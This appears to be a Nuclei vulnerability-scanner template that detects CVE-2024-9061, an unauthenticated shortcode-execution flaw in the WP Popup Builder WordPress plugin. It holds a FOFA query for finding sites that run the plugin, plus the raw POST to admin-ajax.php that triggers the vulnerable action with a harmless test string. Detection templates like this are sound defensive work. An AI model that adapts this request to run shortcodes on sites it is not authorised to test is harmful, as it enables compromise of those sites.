id: CVE-2024-9061 info: name: WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution author: s4e-io severity: high description: | The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-9061 - https://www.wordfence.com/threat-intel/vulnerabilities/id/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve - https://github.com/RandomRobbieBF/CVE-2024-9061 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2024-9061 cwe-id: CWE-94 epss-score: 0.00046 epss-percentile: 0.18015 metadata: max-request: 2 verified: true vendor: themehunk product: wp-popup-builder framework: wordpress fofa-query: body="/wp-content/plugins/wp-popup-builder/" tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body, "/wp-content/plugins/wp-popup-builder")' - 'status_code == 200' condition: and internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31 matchers: - type: dsl dsl: - 'len(body) == 13' - 'contains(body, "CVE-2024-9061")' - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100f80fec38e7c5f649695bac35530600b4fbfa1daa9782d746571908c193ec333d022100f9b434ac3748d54c493f2ad2d7bf045e53c97e1abd079858c054b0ce2f03e0e5:922c64590222798bb761d5b6d8e72950